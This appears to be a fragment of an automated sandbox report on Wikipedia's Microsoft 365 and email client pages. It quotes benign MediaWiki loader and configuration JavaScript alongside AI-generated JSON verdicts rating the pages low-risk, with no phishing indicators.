selection[i]]=selection[i]in this.values?this.values[selection[i]]:fallback;}}return results;}if(selection===undefined){results={};for(var key in this.values){results[key]=this.values[key];}return results;}return fallback;},set:function(selection,value){if(arguments.length>1){if(typeof selection==='string'){this.values[selection]=value;return true;}}else if(typeof selection==='object'){for(var key in selection){this.values[key]=selection[key];}return true;}return false;},exists:function(selection){return typeof selection==='string'&&selection in this.values;}};var log=function(){};log.warn=Function.prototype.bind.call(con.warn,con);var mw={now:function(){var perf=window.performance;var navStart=perf&&perf.timing&&perf.timing.navigationStart;mw.now=navStart&&perf.now?function(){return navStart+perf.now();}:Date.now;return mw.now();},trackQueue:[],trackError:function(data){if(mw.track){mw.track('resourceloader.exception',data);}else{mw.trackQueue.push({topic:'resourceloader.exception',
args:[data]});}var e=data.exception;var msg=(e?'Exception':'Error')+' in '+data.source+(data.module?' in module '+data.module:'')+(e?':':'.');con.log(msg);if(e){con.warn(e);}},Map:Map,config:new Map(),messages:new Map(),templates:new Map(),log:log};window.mw=window.mediaWiki=mw;window.QUnit=undefined;}());(function(){'use strict';var store,hasOwn=Object.hasOwnProperty;function fnv132(str){var hash=0x811C9DC5;for(var i=0;i<str.length;i++){hash+=(hash<<1)+(hash<<4)+(hash<<7)+(hash<<8)+(hash<<24);hash^=str.charCodeAt(i);}hash=(hash>>>0).toString(36).slice(0,5);while(hash.length<5){hash='0'+hash;}return hash;}var registry=Object.create(null),sources=Object.create(null),handlingPendingRequests=false,pendingRequests=[],queue=[],jobs=[],willPropagate=false,errorModules=[],baseModules=["jquery","mediawiki.base"],marker=document.querySelector('meta[name="ResourceLoaderDynamicStyles"]'),lastCssBuffer;function addToHead(el,nextNode){if(nextNode&&nextNode.parentNode){nextNode.parentNode.
insertBefore(el,nextNode);}else{document.head.appendChild(el);}}function newStyleTag(text,nextNode){var el=document.createElement('style');el.appendChild(document.createTextNode(text));addToHead(el,nextNode);return el;}function flushCssBuffer(cssBuffer){if(cssBuffer===lastCssBuffer){lastCssBuffer=null;}newStyleTag(cssBuffer.cssText,marker);for(var i=0;i<cssBuffer.callbacks.length;i++){cssBuffer.callbacks[i]();}}function addEmbeddedCSS(cssText,callback){if(!lastCssBuffer||cssText.startsWith('@import')){lastCssBuffer={cssText:'',callbacks:[]};requestAnimationFrame(flushCssBuffer.bind(null,lastCssBuffer));}lastCssBuffer.cssText+='\n'+cssText;lastCssBuffer.callbacks.push(callback);}function getCombinedVersion(modules){var hashes=modules.reduce(function(result,module){return result+registry[module].version;},'');return fnv132(hashes);}function allReady(modules){for(var i=0;i<modules.length;i++){if(mw.loader.getState(modules[i])!=='ready'){return false;}}return true;}function
allWithImplicitReady(module) |
| URL: https://en.wikipedia.org/wiki/List_of_Microsoft_36... Model: Joe Sandbox AI | {
"risk_score": 2,
"reasoning": "This JavaScript snippet appears to be a configuration script for the Wikipedia website, setting various CSS classes and preferences for the user interface. It does not contain any high-risk indicators like dynamic code execution, data exfiltration, or redirects to suspicious domains. The script is primarily responsible for managing the user's visual preferences and settings, which is a common and legitimate practice for web applications. While it uses some legacy APIs like `XDomainRequest`, these pose minor risks and are not inherently malicious. Overall, this script demonstrates benign behavior and can be considered low-risk."
} |
(function(){var className="client-js vector-feature-language-in-header-enabled vector-feature-language-in-main-page-header-disabled vector-feature-sticky-header-disabled vector-feature-page-tools-pinned-disabled vector-feature-toc-pinned-clientpref-1 vector-feature-main-menu-pinned-disabled vector-feature-limited-width-clientpref-1 vector-feature-limited-width-content-enabled vector-feature-custom-font-size-clientpref-1 vector-feature-appearance-pinned-clientpref-1 vector-feature-night-mode-enabled skin-theme-clientpref-day vector-toc-available";var cookie=document.cookie.match(/(?:^|; )enwikimwclientpreferences=([^;]+)/);if(cookie){cookie[1].split('%2C').forEach(function(pref){className=className.replace(new RegExp('(^| )'+pref.replace(/-clientpref-\w+$|[^\w-]+/g,'')+'-clientpref-\\w+( |$)'),'$1'+pref+'$2');});}document.documentElement.className=className;}());RLCONF={"wgBreakFrames":false,"wgSeparatorTransformTable":["",""],"wgDigitTransformTable":["",""],"wgDefaultDateFormat":"dmy",
"wgMonthNames":["","January","February","March","April","May","June","July","August","September","October","November","December"],"wgRequestId":"e35d04a7-4291-4093-8a7f-97bd65f191ad","wgCanonicalNamespace":"","wgCanonicalSpecialPageName":false,"wgNamespaceNumber":0,"wgPageName":"List_of_Microsoft_365_applications_and_services","wgTitle":"List of Microsoft 365 applications and services","wgCurRevisionId":1265800254,"wgRevisionId":1265800254,"wgArticleId":18784745,"wgIsArticle":true,"wgIsRedirect":false,"wgAction":"view","wgUserName":null,"wgUserGroups":["*"],"wgCategories":["Articles with short description","Short description is different from Wikidata","Microsoft Office","Microsoft lists","Office suites for Windows","Office suites for macOS"],"wgPageViewLanguage":"en","wgPageContentLanguage":"en","wgPageContentModel":"wikitext","wgRelevantPageName":"List_of_Microsoft_365_applications_and_services","wgRelevantArticleId":18784745,"wgIsProbablyEditable":true,
"wgRelevantPageIsProbablyEditable":true,"wgRestrictionEdit":[],"wgRestrictionMove":[],"wgRedirectedFrom":"List_of_Microsoft_365_Applications","wgNoticeProject":"wikipedia","wgCiteReferencePreviewsActive":false,"wgFlaggedRevsParams":{"tags":{"status":{"levels":1}}},"wgMediaViewerOnClick":true,"wgMediaViewerEnabledByDefault":true,"wgPopupsFlags":0,"wgVisualEditor":{"pageLanguageCode":"en","pageLanguageDir":"ltr","pageVariantFallbacks":"en"},"wgMFDisplayWikibaseDescriptions":{"search":true,"watchlist":true,"tagline":false,"nearby":true},"wgWMESchemaEditAttemptStepOversample":false,"wgWMEPageLength":7000,"wgInternalRedirectTargetUrl":"/wiki/List_of_Microsoft_365_applications_and_services","wgRelatedArticlesCompat":[],"wgEditSubmitButtonLabelPublish":true,"wgULSPosition":"interlanguage","wgULSisCompactLinksEnabled":false,"wgVector2022LanguageInHeader":true,"wgULSisLanguageSelectorEmpty":false,"wgWikibaseItemId":"Q6360556","wgCheckUserClientHintsHeadersJsApi":["brands","architecture",
"bitness","fullVersionList","mobile","model","platform","platformVersion"],"GEHomepageSuggestedEditsEnableTopics":true,"wgGETopicsMatchModeEnabled":false,"wgGEStructuredTaskRejectionReasonTextInputEnabled":false,"wgGELevelingUpEnabledForUser":false};RLSTATE={"ext.globalCssJs.user.styles":"ready","site.styles":"ready","user.styles":"ready","ext.globalCssJs.user":"ready","user":"ready","user.options":"loading","ext.cite.styles":"ready","skins.vector.search.codex.styles":"ready","skins.vector.styles":"ready","skins.vector.icons":"ready","jquery.tablesorter.styles":"ready","jquery.makeCollapsible.styles":"ready","ext.wikimediamessages.styles":"ready","ext.visualEditor.desktopArticleTarget.noscript":"ready","ext.uls.interlanguage":"ready","wikibase.client.init":"ready","ext.wikimediaBadges":"ready"};RLPAGEMODULES=["mediawiki.action.view.redirect","ext.cite.ux-enhancements","site","mediawiki.page.ready","jquery.tablesorter","jquery.makeCollapsible","mediawiki.toc","skins.vector.js",
"ext.centralNotice.geoIP","ext.centralNotice.s |
| URL: https://en.wikipedia.org/wiki/List_of_Microsoft_365_Applications#DummyBot Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://en.wikipedia.org/wiki/List_of_Microsoft_365_applications_and_services#DummyBot Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://en.wikipedia.org Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": false,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": true,
"brand_spoofing_attempt": false,
"third_party_hosting": false
} |
URL: https://en.wikipedia.org |
| URL: https://en.wikipedia.org/wiki/List_of_Microsoft_365_Applications#DummyBot Model: Joe Sandbox AI | {
"brands": [
"Microsoft"
]
} |
|
| URL: https://en.wikipedia.org/wiki/List_of_Microsoft_365_applications_and_services#DummyBot Model: Joe Sandbox AI | {
"brands": [
"Microsoft"
]
} |
|
| URL: https://en.wikipedia.org/wiki/Email_client#DummyBot Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://en.wikipedia.org/wiki/Email_client#DummyBot Model: Joe Sandbox AI | {
"brands": [
"Mozilla Thunderbird"
]
} |
|
| URL: https://wikipedia.org Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": false,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": true,
"brand_spoofing_attempt": false,
"third_party_hosting": false
} |
URL: https://wikipedia.org |
Edit tour
chrome.exe (PID: 6232 cmdline: 
Key Decision
Richest Path
Thread / callback creation
Lower opacity -> Library Node